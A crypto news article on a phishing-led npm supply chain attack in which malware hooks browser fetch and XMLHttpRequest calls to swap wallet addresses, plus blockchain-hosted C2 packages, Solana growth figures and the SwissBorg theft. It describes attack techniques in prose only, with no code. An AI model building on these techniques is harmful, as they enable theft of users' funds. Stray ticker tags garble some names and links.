Solana News Today: Open-Source Trust Hacked: Malware Stealthily Hijacks Crypto Transactions

Ledger CTO Charles Guillemet has issued a warning regarding a significant supply chain attack on the npm package ecosystem, which has potentially impacted billions of downloads. The compromised packages, many of which are widely used in browser-based environments, introduce a stealthy form of malware that intercepts and manipulates cryptocurrency transactions, particularly affecting platforms such as EthereumETH-- and SolanaSOL--. The attack vector was attributed to a phishing campaign that led to the compromise of a core developer's npm account. The malware has been observed to inject itself into browser processes, allowing it to alter transaction parameters and redirect funds to attacker-controlled addresses without user awareness. The incident has prompted heightened caution across the Solana ecosystem, with the community emphasizing the need for enhanced security practices and vigilance against such sophisticated threats.

The compromised npm packages include highly popular ones such as chalk, debug, ansi-styles, and supports-color, all of which collectively account for over 2 billion weekly downloads. The malicious code injected into these packages functions by hooking into essential browser APIs such as fetch and XMLHttpRequest, thereby enabling the interception of sensitive data like wallet addresses and transaction payloads. It leverages string-matching techniques to identify and replace legitimate addresses with look-alike ones, making it challenging for users to detect any anomalies in the transaction process. The malware is particularly effective in environments where crypto wallets are used, as it ensures that the user interface remains unchanged, while silently altering transaction details in the background. This stealthy behavior underscores the complexity and sophistication of the attack, highlighting the evolving tactics employed by cybercriminals to exploit trusted open-source infrastructure.

In addition to the npm compromise, similar malicious activities were uncovered by ReversingLabs researchers, who identified two new npm packages—colortoolsv2 and mimelib2—as part of a broader campaign leveraging Ethereum smart contracts to host command and control (C2) commands. These packages were found to deploy malware by fetching and executing payloads from blockchain-based C2 servers, thereby evading traditional detection methods. The approach represents a novel use of blockchain technology in the context of supply chain attacks, where threat actors exploit the decentralized and immutable nature of smart contracts to obfuscate their malicious intentions. The packages were subsequently removed from npm, but the broader campaign extended to GitHub, where repositories were crafted to appear legitimate and attract developers to incorporate the malicious dependencies. The campaign demonstrates how attackers are increasingly leveraging social engineering and deceptive practices to manipulate open-source communities.

The Solana ecosystem has responded swiftly to the incident, with co-founder Anatoly Yakovenko emphasizing the network’s growing economic activity and scalability. In a recent public statement, Yakovenko highlighted Solana’s processing of 2.9 billion transactions in August 2025, a figure that surpasses Ethereum’s total transaction volume since 2015 within a single month. This performance underscores Solana’s capacity to handle high-frequency transactions and large-scale decentralized applications (dApps), which has contributed to a 92% year-over-year increase in network-generated revenue. The number of active wallets on Solana also doubled to 83 million, while the issuance of new tokens reached 843,000, with 357 tokens valued at over $1 million. These metrics have been interpreted as a response to criticisms that Solana is merely a showcase for high throughput without substantive economic activity. Yakovenko’s comments reaffirm the platform’s focus on scalability and real-world utility, which has drawn comparisons to Ethereum’s evolving capabilities.

In response to the security vulnerabilities exposed by the npm supply chain attack, industry players have reinforced their commitment to blockchain infrastructure resilience. The Swiss-based crypto platform SwissBorg recently suffered a $41 million loss in Solana due to a compromised staking partner API, which attackers exploited to drain funds from its SOL Earn Program. In light of such incidents, Ledger CTO Charles Guillemet advised users to temporarily halt onchain transactions if they were not utilizing hardware wallets. This recommendation reflects a broader push for adopting best practices in digital assetDAAQ-- management, including multi-signature wallets, smart contract audits, and continuous monitoring of third-party dependencies. The incident also highlights the interconnected nature of the crypto ecosystem, where vulnerabilities in one component can have cascading effects across platforms. As a result, developers and platform operators are being urged to adopt a proactive approach to security, emphasizing transparency and collaboration in mitigating emerging threats.

Looking ahead, the implications of this supply chain attack extend beyond the immediate security concerns, raising questions about the governance and oversight of open-source ecosystems. The reliance on third-party libraries and developer trust in repositories such as npm has exposed systemic risks that could undermine the integrity of decentralized systems. The Solana community has responded by accelerating updates to its consensus protocols, such as the recent Alpenglow upgrade, which significantly improves transaction finality and fault tolerance. These developments are seen as part of a broader effort to strengthen infrastructure resilience while maintaining high throughput and low latency. Meanwhile, industry stakeholders are increasingly advocating for the adoption of tools and frameworks designed to detect and prevent malicious code from being integrated into legitimate software projects. As the lines between open-source collaboration and security vulnerabilities continue to blur, the need for robust governance mechanisms and developer education is becoming increasingly evident.

Source:

[1] Largest NPM Compromise in History - Supply Chain Attack (https://www.redditRDDT--.com/r/programming/comments/1nbqt4d/largest_npm_compromise_in_history_supply_chain/)

[2] Ethereum smart contracts used to push malicious code on (https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code)

[3] npm debug and chalk packages compromised (https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised)

[4] Solana (SOL) Founder Makes Statement About Ethereum (https://www.mexc.com/news/solana-sol-founder-makes-statement-about-ethereum-what-theyve-been-able-to-do-since-2015-we/88247)

[5] Solana, Snorter, and Profitable Mining Usher in a New Era (https://coincentral.com/on-chain-technology-meets-financial-integration-solana-snorter-and-profitable-mining-usher-in-a-new-era/)

[6] SwissBorg crypto platform robbed of over $40 million in (https://www.theblock.co/post/369924/swissborg-crypto-platform-robbed-of-over-40-million-in-solana?utm_medium=rss&utm_source=companies.xml)

[7] Solana: Latest News, Social Media Updates and Insights (https://cryptorank.io/news/solana)